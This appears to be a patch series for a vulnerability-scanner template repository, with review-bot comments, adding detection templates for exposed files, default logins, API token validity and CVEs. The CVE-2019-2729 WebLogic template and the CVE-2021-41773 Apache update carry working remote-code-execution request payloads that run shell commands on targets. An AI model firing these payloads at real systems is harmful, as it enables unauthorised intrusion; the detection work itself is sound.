index 44598c428a..357fb1bdbf 100644
--- a/token-spray/tinypng.yaml
+++ b/token-spray/tinypng.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,tinypng
+self-contained: true
requests:
- method: POST
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Basic {{base64('api:' + token)}}
- self-contained: true
matchers:
- type: word
part: header
diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml
index c17c49290f..3b43f9e529 100644
--- a/token-spray/travisci.yaml
+++ b/token-spray/travisci.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,travis
+self-contained: true
requests:
- method: GET
path:
@@ -15,7 +16,6 @@ requests:
Travis-API-Version: 3
Authorization: token {{token}}
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml
index 9657045185..ec654b2782 100644
--- a/token-spray/twitter.yaml
+++ b/token-spray/twitter.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,twitter
+self-contained: true
requests:
- method: GET
path:
@@ -14,7 +15,6 @@ requests:
headers:
Authorization: Bearer {{token}}
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml
index d7d6c6b836..e7c0a0a2f8 100644
--- a/token-spray/visualstudio.yaml
+++ b/token-spray/visualstudio.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,visualstudio,microsoft
+self-contained: true
requests:
- method: GET
path:
@@ -15,7 +16,6 @@ requests:
Content-Type: application/json
X-Api-Token: "{{token}}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml
index c54d184fc1..7237446fce 100644
--- a/token-spray/wakatime.yaml
+++ b/token-spray/wakatime.yaml
@@ -7,12 +7,12 @@ info:
severity: info
tags: token-spray,wakatime
+self-contained: true
requests:
- method: GET
path:
- "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}"
- self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml
index 79ddab793f..37e6b647ef 100644
--- a/token-spray/weglot.yaml
+++ b/token-spray/weglot.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weglot
+self-contained: true
requests:
- method: POST
path:
@@ -15,7 +16,6 @@ requests:
Content-Type: application/json
body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}"
- self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml
index 1546808ea7..8c1384579b 100644
--- a/token-spray/youtube.yaml
+++ b/token-spray/youtube.yaml
@@ -7,18 +7,19 @@ info:
severity: info
tags: token-spray,youtube
+self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
- matchers-condition: or
- self-contained: true
+ matchers-condition: or
matchers:
- type: word
part: body
words:
- 'quotaExceeded'
+
- type: status
status:
- 200
From 0d59819a8a97c398b04ec4cc148f141fedbc4db2 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Wed, 20 Oct 2021 14:17:32 +0530
Subject: [PATCH 13/39] misc update
---
token-spray/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/token-spray/README.md b/token-spray/README.md
index e49667d4b7..4c463e5694 100644
--- a/token-spray/README.md
+++ b/token-spray/README.md
@@ -4,7 +4,7 @@ This directory holds templates that have static API URL endpoints. Use these to
## Usage
-**token-spray** are self-contained template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
+token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
```console
# Running token-spray templates against a single token to test
From 9ded2fcccf0c311f45d45b55ccc25bbf0dc6390e Mon Sep 17 00:00:00 2001
From: Sufijen Bani
Date: Wed, 20 Oct 2021 18:28:48 +0200
Subject: [PATCH 14/39] Add Gruntfile Expose Test
Gruntfile can include secrets or other information that helps find
further vulnerabilities.
---
exposures/configs/gruntfile.yaml | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 exposures/configs/gruntfile.yaml
diff --git a/exposures/configs/gruntfile.yaml b/exposures/configs/gruntfile.yaml
new file mode 100644
index 0000000000..bac81870cb
--- /dev/null
+++ b/exposures/configs/gruntfile.yaml
@@ -0,0 +1,27 @@
+id: gruntfile
+
+info:
+ name: gruntfile exposure
+ author: sbani
+ severity: info
+ reference: https://gruntjs.com/sample-gruntfile
+ tags: config,exposure
+
+requests:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/Gruntfile.js"
+ - "{{BaseURL}}/Gruntfile.coffee"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "module.exports"
+ part: body
+
+ - type: status
+ status:
+ - 200
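Review bot: The `info` block has no `description`, so the reason an exposed Gruntfile matters is recorded only in the commit message and is lost to anyone reading scan output. Add a line under `reference`, for example `description: Exposed Gruntfile may reveal build configuration, internal paths or secrets.` The `jetbrains-datasources.yaml` template added in the next patch already uses this field.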
From ecdb28d8265683765e71050a53c7812077cbfe28 Mon Sep 17 00:00:00 2001
From: Florian Maak
Date: Wed, 20 Oct 2021 19:07:25 +0200
Subject: [PATCH 15/39] Add jetbrains datasource exposure check
---
exposures/configs/jetbrains-datasources.yaml | 24 ++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 exposures/configs/jetbrains-datasources.yaml
diff --git a/exposures/configs/jetbrains-datasources.yaml b/exposures/configs/jetbrains-datasources.yaml
new file mode 100644
index 0000000000..b09b7da590
--- /dev/null
+++ b/exposures/configs/jetbrains-datasources.yaml
@@ -0,0 +1,24 @@
+id: package-json
+
+info:
+ name: Jetbrains IDE DataSources exposure
+ author: FlorianMaak
+ severity: info
+ description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure.
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.idea/dataSources.xml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "uuid"
+ part: body
+
+ - type: status
+ status:
+ - 200
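Review bot: `id: package-json` does not describe this template and looks copied from a different one, so findings for `/.idea/dataSources.xml` would be reported under the wrong id. It may also collide with an existing template of that name, which is not visible here. Use an id derived from the file name, e.g. `id: jetbrains-datasources`. The `uuid` word matcher is generic enough to match unrelated 200 responses; a string specific to the dataSources.xml format would cut false positives.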
From ccc026ac704daa6dd44a19ca68cc7075033ed85d Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Wed, 20 Oct 2021 13:44:17 -0500
Subject: [PATCH 16/39] Update github-workflows-disclosure.yaml
Might expose a SNYK_TOKEN
---
exposures/configs/github-workflows-disclosure.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml
index af981920a3..e7d9ea7f28 100644
--- a/exposures/configs/github-workflows-disclosure.yaml
+++ b/exposures/configs/github-workflows-disclosure.yaml
@@ -36,6 +36,7 @@ requests:
- "{{BaseURL}}/.github/workflows/ci-daily.yml"
- "{{BaseURL}}/.github/workflows/ci-issues.yml"
- "{{BaseURL}}/.github/workflows/smoosh-status.yml"
+ - "{{BaseURL}}/.github/workflows/snyk.yml"
matchers-condition: and
matchers:
From 5178c7e17d464074b15e0b24775030f2aaf870f1 Mon Sep 17 00:00:00 2001
From: Daniel Saxton
Date: Wed, 20 Oct 2021 16:04:42 -0500
Subject: [PATCH 17/39] Fix case in S3 bucket detection template
---
technologies/aws/aws-bucket-service.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/technologies/aws/aws-bucket-service.yaml b/technologies/aws/aws-bucket-service.yaml
index ad824b8670..f2d61d54f4 100644
--- a/technologies/aws/aws-bucket-service.yaml
+++ b/technologies/aws/aws-bucket-service.yaml
@@ -18,7 +18,7 @@ requests:
- contains(tolower(all_headers), 'x-amz-bucket')
- contains(tolower(all_headers), 'x-amz-request')
- contains(tolower(all_headers), 'x-amz-id')
- - contains(tolower(all_headers), 'AmazonS3')
+ - contains(tolower(all_headers), 'amazons3')
part: header
condition: or
From 9cc075011a03ad95cb0d137523c86adff7fc6f2a Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Wed, 20 Oct 2021 16:16:15 -0500
Subject: [PATCH 18/39] Create detect-jabber-xmpp.yaml
---
network/detect-jabber-xmpp.yaml | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 network/detect-jabber-xmpp.yaml
diff --git a/network/detect-jabber-xmpp.yaml b/network/detect-jabber-xmpp.yaml
new file mode 100644
index 0000000000..7dbfdd8e64
--- /dev/null
+++ b/network/detect-jabber-xmpp.yaml
@@ -0,0 +1,24 @@
+id: detect-jabber-xmpp
+
+info:
+ name: Detects Jabber XMPP Instance
+ author: geeknik
+ severity: info
+ description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
+ reference: https://datatracker.ietf.org/doc/html/rfc6120
+ tags: network,jabber,xmpp
+
+network:
+ - inputs:
+ - data: "a\n"
+
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:5222"
+
+ matchers:
+ - type: word
+ words:
+ - "stream:stream xmlns:stream"
+ - "stream:error xmlns:stream"
+ condition: or
From f05e7364ca06e77a080464696f1b4a4e055eba03 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 20 Oct 2021 22:40:20 +0000
Subject: [PATCH 19/39] Auto Generated CVE annotations [Wed Oct 20 22:40:20 UTC
2021] :robot:
---
cves/2021/CVE-2021-20031.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml
index 97ff54f001..2dc86669e2 100644
--- a/cves/2021/CVE-2021-20031.yaml
+++ b/cves/2021/CVE-2021-20031.yaml
@@ -3,7 +3,7 @@ id: CVE-2021-20031
info:
name: Sonicwall SonicOS 7.0 - Host Header Injection
author: gy741
- severity: low
+ severity: medium
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
reference:
- https://www.exploit-db.com/exploits/50414
@@ -11,6 +11,11 @@ info:
metadata:
google-dork: inurl:"auth.html" intitle:"SonicWall"
tags: cve,cve2021,sonicwall,redirect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-20031
+ cwe-id: CWE-601
requests:
- raw:
From 06b38542fff0920a508faca59a6225c6d68d1f07 Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Thu, 21 Oct 2021 04:11:30 +0530
Subject: [PATCH 20/39] Update jetbrains-datasources.yaml
---
exposures/configs/jetbrains-datasources.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/exposures/configs/jetbrains-datasources.yaml b/exposures/configs/jetbrains-datasources.yaml
index b09b7da590..2be4dd0504 100644
--- a/exposures/configs/jetbrains-datasources.yaml
+++ b/exposures/configs/jetbrains-datasources.yaml
@@ -1,4 +1,4 @@
-id: package-json
+id: jetbrains-datasource
info:
name: Jetbrains IDE DataSources exposure
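Review bot: The new id `jetbrains-datasource` is singular while the file is `jetbrains-datasources.yaml`. Patches 21 and 22 in this series bring id and file name into agreement (`gruntfile-exposure`, `samsung-printer-detect`), so this one should read `id: jetbrains-datasources`. Keeping the two identical makes it easier to include or exclude the template by id and to trace a finding back to its file.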
@@ -16,7 +16,7 @@ requests:
matchers:
- type: word
words:
- - "uuid"
+ - "DataSourceManagerImpl"
part: body
- type: status
From cda7245de9a7a1ebd7088a9f93063df38f0201ce Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 21 Oct 2021 04:21:52 +0530
Subject: [PATCH 21/39] misc update
---
.../{gruntfile.yaml => gruntfile-exposure.yaml} | 12 +++++++-----
1 file changed, 7 insertions(+), 5 deletions(-)
rename exposures/configs/{gruntfile.yaml => gruntfile-exposure.yaml} (78%)
diff --git a/exposures/configs/gruntfile.yaml b/exposures/configs/gruntfile-exposure.yaml
similarity index 78%
rename from exposures/configs/gruntfile.yaml
rename to exposures/configs/gruntfile-exposure.yaml
index bac81870cb..a4fddba012 100644
--- a/exposures/configs/gruntfile.yaml
+++ b/exposures/configs/gruntfile-exposure.yaml
@@ -1,7 +1,7 @@
-id: gruntfile
+id: gruntfile-exposure
info:
- name: gruntfile exposure
+ name: Gruntfile Exposure
author: sbani
severity: info
reference: https://gruntjs.com/sample-gruntfile
@@ -9,18 +9,20 @@ info:
requests:
- method: GET
- redirects: true
- max-redirects: 3
path:
- "{{BaseURL}}/Gruntfile.js"
- "{{BaseURL}}/Gruntfile.coffee"
+ redirects: true
+ max-redirects: 2
matchers-condition: and
matchers:
- type: word
+ part: body
+ condition: and
words:
- "module.exports"
- part: body
+ - "grunt"
- type: status
status:
From c6c171623b1112549f53f67668afe838981c1371 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 21 Oct 2021 04:24:31 +0530
Subject: [PATCH 22/39] mosc update
---
exposed-panels/samsung-printer-detect.yaml | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/exposed-panels/samsung-printer-detect.yaml b/exposed-panels/samsung-printer-detect.yaml
index e1d5389fa2..c4e1f09352 100644
--- a/exposed-panels/samsung-printer-detect.yaml
+++ b/exposed-panels/samsung-printer-detect.yaml
@@ -1,22 +1,24 @@
-id: samsung-printer-Detect
+id: samsung-printer-detect
+
info:
name: SAMSUNG Printer Detection
author: pussycat0x
severity: info
+ tags: iot,panel
metadata:
fofa-dork: 'app="SAMSUNG-Printer"'
- tags: iot
+
requests:
- method: GET
path:
- "{{BaseURL}}/sws/index.html"
+
matchers-condition: and
matchers:
- type: word
words:
- ' SyncThru Web Service '
- condition: and
- part: body
+
- type: status
status:
- 200
\ No newline at end of file
From 323da341b2584b5f6a82d82fbe3098dcd3b4f45c Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 21 Oct 2021 05:37:30 +0530
Subject: [PATCH 23/39] Added CVE-2019-2729 (Oracle WebLogic RCE)
---
cves/2019/CVE-2019-2729.yaml | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 cves/2019/CVE-2019-2729.yaml
diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml
new file mode 100644
index 0000000000..b28e4ae9bf
--- /dev/null
+++ b/cves/2019/CVE-2019-2729.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-2729
+
+info:
+ name: Oracle WebLogic Server Administration Console Handle RCE
+ author: igibanez
+ severity: critical
+ description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-2729
+ tags: cve,cve2019,oracle,rce,weblogic
+
+requests:
+ - raw:
+ - |
+ POST /wls-wsat/CoordinatorPortType HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+
+ xxxxorg.slf4j.ext.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${IFS}9272-9102-EVC|revconnectionHandlertrue]]>
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "CVE-2019-2729"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
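Review bot: The word matcher at the end of this new template looks for the bare string `CVE-2019-2729`, which an IPS or WAF block page naming the CVE can also return with a 200, so a host that merely blocked the request can be reported as a critical finding. Patch 25 in this series fixes the same false positive for CVE-2021-41773 by extending the echoed marker. The same should be done here, changing the marker in the request body and the matcher together, e.g. `- "CVE-2019-2729-POC"`. The matcher sets no `part:`, so adding `part: body` would make the intended scope explicit. The `info` block also has no `reference:` entry pointing at the advisory.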
From 1eaff3bfff72535c9496411ca09b8f7e4b41170c Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 21 Oct 2021 07:17:51 +0530
Subject: [PATCH 24/39] misc update
---
default-logins/hp/hp-switch-default-login.yaml | 4 +---
.../idemia/idemia-biometrics-default-login.yaml | 9 ++++-----
2 files changed, 5 insertions(+), 8 deletions(-)
diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml
index aa854686cb..beada2b11a 100644
--- a/default-logins/hp/hp-switch-default-login.yaml
+++ b/default-logins/hp/hp-switch-default-login.yaml
@@ -20,15 +20,13 @@ requests:
username:
- admin
- attack: sniper
-
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""'
- condition: and
- type: status
status:
diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml
index 9c7aa9d12a..959da5926b 100644
--- a/default-logins/idemia/idemia-biometrics-default-login.yaml
+++ b/default-logins/idemia/idemia-biometrics-default-login.yaml
@@ -18,22 +18,21 @@ requests:
payloads:
password:
- - 12345
- attack: sniper
+ - "12345"
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- "session_id="
- "resource"
- condition: and
- type: word
- words:
- - "Invalid Password"
part: body
negative: true
+ words:
+ - "Invalid Password"
- type: status
status:
From 56b0f60d5a26b2ad56d2b76b35263b5f3f47fb13 Mon Sep 17 00:00:00 2001
From: Philippe Delteil
Date: Thu, 21 Oct 2021 00:57:23 -0300
Subject: [PATCH 25/39] Update CVE-2021-41773.yaml
Fixes false positive due to IPS/
'Request denied by WatchGuard Firewall.
Reason: IPS detected for "WEB Apache HTTP Server Path traversal (CVE-2021-41773)"'
---
cves/2021/CVE-2021-41773.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml
index 473c7adbcb..4b8ac8ef2a 100644
--- a/cves/2021/CVE-2021-41773.yaml
+++ b/cves/2021/CVE-2021-41773.yaml
@@ -31,7 +31,7 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- echo Content-Type: text/plain; echo; echo 37714-1202-EVC | rev
+ echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
matchers-condition: or
matchers:
@@ -44,4 +44,4 @@ requests:
- type: word
name: RCE
words:
- - "CVE-2021-41773"
+ - "CVE-2021-41773-POC"
From 691dab8a52adb6810d642cf7997495a175c4a56d Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Thu, 21 Oct 2021 08:51:56 +0300
Subject: [PATCH 26/39] Add description
---
vulnerabilities/other/phpwiki-lfi.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/phpwiki-lfi.yaml b/vulnerabilities/other/phpwiki-lfi.yaml
index d48b733698..0d0a84e034 100644
--- a/vulnerabilities/other/phpwiki-lfi.yaml
+++ b/vulnerabilities/other/phpwiki-lfi.yaml
@@ -4,6 +4,7 @@ info:
name: phpwiki 1.5.4 - XSS / Local File Inclusion
author: 0x_Akoko
severity: high
+ description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
reference: https://www.exploit-db.com/exploits/38027
tags: phpwiki,lfi
From f1d4569a8cfe5c40b2ac2bb7c76b4c49fe995830 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Thu, 21 Oct 2021 08:52:48 +0300
Subject: [PATCH 27/39] Add description
---
vulnerabilities/oracle/oracle-siebel-xss.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/oracle/oracle-siebel-xss.yaml b/vulnerabilities/oracle/oracle-siebel-xss.yaml
index 19e3bc099e..3d3374470c 100644
--- a/vulnerabilities/oracle/oracle-siebel-xss.yaml
+++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml
@@ -4,6 +4,7 @@ info:
name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability
author: dhiyaneshDK
severity: medium
+ description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint.
reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
tags: xss,oracle
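Review bot: The added `description:` line misspells "arbitrary" as `arbitary`. This text is surfaced in scan output, so the phrase should read `inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint`.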
From 379513c0155f31cd5787ce1cc0e53fa750ec60dd Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Thu, 21 Oct 2021 08:55:02 +0300
Subject: [PATCH 28/39] Make description more clear
---
vulnerabilities/other/pmb-directory-traversal.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml
index 74427ef576..927daf9a9f 100644
--- a/vulnerabilities/other/pmb-directory-traversal.yaml
+++ b/vulnerabilities/other/pmb-directory-traversal.yaml
@@ -4,7 +4,7 @@ info:
name: PMB 5.6 Directory Traversal
author: geeknik
severity: medium
- description: The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure.
+ description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, this can in turn be used to a Local File Disclosure.
reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
tags: lfi
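Review bot: The reworded `description:` is a comma splice and ends in the ungrammatical `used to a Local File Disclosure`, so it reads less clearly than the line it replaces. Something like `description: The PMB Gif Image does not sanitize the content of the 'chemin' parameter, which can lead to Local File Disclosure.` keeps the added detail and parses cleanly.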
From 6d28009f5e618286c09f67135abecc3bc6a1f77f Mon Sep 17 00:00:00 2001
From: Sufijen Bani
Date: Thu, 21 Oct 2021 09:41:25 +0200
Subject: [PATCH 29/39] Add Deeper Search for Access Logs
Search access logs in more folders. This happens for error logs too.
---
exposures/logs/access-log.yaml | 3 +++
1 file changed, 3 insertions(+)
diff --git a/exposures/logs/access-log.yaml b/exposures/logs/access-log.yaml
index 16c3349ad5..324e4fe9af 100644
--- a/exposures/logs/access-log.yaml
+++ b/exposures/logs/access-log.yaml
@@ -10,6 +10,9 @@ requests:
- method: GET
path:
- "{{BaseURL}}/access.log"
+ - "{{BaseURL}}/log/access.log"
+ - "{{BaseURL}}/logs/access.log"
+ - "{{BaseURL}}/application/logs/access.log"
matchers-condition: and
matchers:
From 378a682a5ed45deffdd8a705b32bbe7fdcefb052 Mon Sep 17 00:00:00 2001
From: Sufijen Bani
Date: Thu, 21 Oct 2021 09:45:23 +0200
Subject: [PATCH 30/39] Enhance Text Matching in Error Logs
Some words are missing that normally indicate that this is an error log.
---
exposures/logs/error-logs.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml
index fef1228189..ffa763ae58 100644
--- a/exposures/logs/error-logs.yaml
+++ b/exposures/logs/error-logs.yaml
@@ -45,6 +45,8 @@ requests:
- "script headers"
- "Broken pipe"
- "Array"
+ - "Exception"
+ - "Fatal"
condition: or
- type: word
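Review bot: The two added words, `"Exception"` and `"Fatal"`, are generic enough to appear on ordinary application pages, and they join a list evaluated with `condition: or`, so either one alone satisfies this matcher. How much that widens the result set depends on the other matchers, which lie outside this hunk. Tighter tokens such as `- "Fatal error"` and `- "Uncaught Exception"` would stay closer to what an error log actually contains and keep the finding useful for triage.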
From fe4e6b8246a5562b682ee7c94b49f33c953df2be Mon Sep 17 00:00:00 2001
From: Philipp Dahse
Date: Thu, 21 Oct 2021 10:14:04 +0200
Subject: [PATCH 31/39] Add Symfony Security Config Expose Template
Symfony security contains information about used encryption algorithms and lists which routes are protected
---
.../configs/symfony-security-config.yaml | 26 +++++++++++++++++++
1 file changed, 26 insertions(+)
create mode 100644 exposures/configs/symfony-security-config.yaml
diff --git a/exposures/configs/symfony-security-config.yaml b/exposures/configs/symfony-security-config.yaml
new file mode 100644
index 0000000000..f11db61824
--- /dev/null
+++ b/exposures/configs/symfony-security-config.yaml
@@ -0,0 +1,26 @@
+id: symfony-security-config
+
+info:
+ name: Symfony Security Configuration Exposure
+ author: dahse89
+ severity: info
+ tags: config,exposure,symfony
+ reference:
+ - https://symfony2-document.readthedocs.io/en/latest/book/security.html
+ - https://symfony.com/doc/current/reference/configuration/security.html
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/config/packages/security.yaml"
+ - "{{BaseURL}}/app/config/security.yml"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "security:"
+ condition: and
+ part: body
From ac9f713d97ec1500da40aaf42862f8e771443aa2 Mon Sep 17 00:00:00 2001
From: Sufijen Bani
Date: Thu, 21 Oct 2021 10:33:49 +0200
Subject: [PATCH 32/39] Merge PHP Errors Templates
There was an extra error template for PHP warnings although there was
another template holding that already.
The status code check (500) is a step that would make sense for all of
the checks. This is not limited to warnings. Though I think that error
code 500 shrinks the result set too much in this case. That's why I
would leave it out.
---
exposures/logs/php-warning.yaml | 25 -------------------------
misconfiguration/php-errors.yaml | 6 +++++-
2 files changed, 5 insertions(+), 26 deletions(-)
delete mode 100644 exposures/logs/php-warning.yaml
diff --git a/exposures/logs/php-warning.yaml b/exposures/logs/php-warning.yaml
deleted file mode 100644
index 4c35a35f47..0000000000
--- a/exposures/logs/php-warning.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: php-warning
-
-info:
- name: PHP warning
- author: dhiyaneshDK
- severity: low
- reference: https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22
- tags: exposure,php,debug
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - '(?m)^([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$'
-
- - type: status
- status:
- - 500
- - 503
- condition: or
diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml
index df2a0c9ae2..2e12d8ec22 100644
--- a/misconfiguration/php-errors.yaml
+++ b/misconfiguration/php-errors.yaml
@@ -2,7 +2,10 @@ id: php-errors
info:
name: PHP errors
- author: w4cky_,geeknik
+ author: w4cky_,geeknik,dhiyaneshDK
+ reference:
+ - https://www.shodan.io/search?query=%22Fatal+error%22
+ - https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22
severity: info
tags: debug,php
@@ -20,6 +23,7 @@ requests:
- '(?i)MySQL server version for the right syntax to use near'
- '(?i)MySQL cannot create a temporary file'
- '(?i)PHP (Warning|Error)'
+ - '(?m)^([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$'
- '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
- '(?i)failed to open stream\:'
- '(?i)SAFE MODE Restriction in effect'
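Review bot: The regex added after `(?i)PHP (Warning|Error)` appears redundant, because that existing pattern is case-insensitive and already matches any body containing `PHP warning`, including inside a page title. If the patterns in this list are OR-ed (the matcher's condition is outside the hunk), the new line never changes the result and only adds a regex evaluation per response. Either drop it or, if the title-only match is wanted as a distinct signal, give it its own named matcher.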
From b39200b8e4b51578a89828f7defbc9cdefd449ea Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Thu, 21 Oct 2021 15:47:46 +0530
Subject: [PATCH 33/39] Update CVE-2021-33044.yaml
---
cves/2021/CVE-2021-33044.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml
index 7797b9e08e..6af86d7e1f 100644
--- a/cves/2021/CVE-2021-33044.yaml
+++ b/cves/2021/CVE-2021-33044.yaml
@@ -40,7 +40,7 @@ requests:
- type: word
part: body
words:
- - "true"
+ - "\"result\":true"
- "id"
- "params"
- "session"
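Review bot: The new word `"\"result\":true"` is an exact substring, so a response serialised as `"result": true` with a space after the colon would no longer match. Whether the device ever emits that form is not visible from this hunk. If it can, a regex matcher with `"result"\s*:\s*true` tolerates both spellings. As a style point, single quotes avoid the escapes: `- '"result":true'`.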
From 7cfaf6c7ddef3fec47bd723537c826585dc3c56a Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 21 Oct 2021 10:43:47 +0000
Subject: [PATCH 34/39] Auto Generated CVE annotations [Thu Oct 21 10:43:47 UTC
2021] :robot:
---
cves/2016/CVE-2016-1000143.yaml | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml
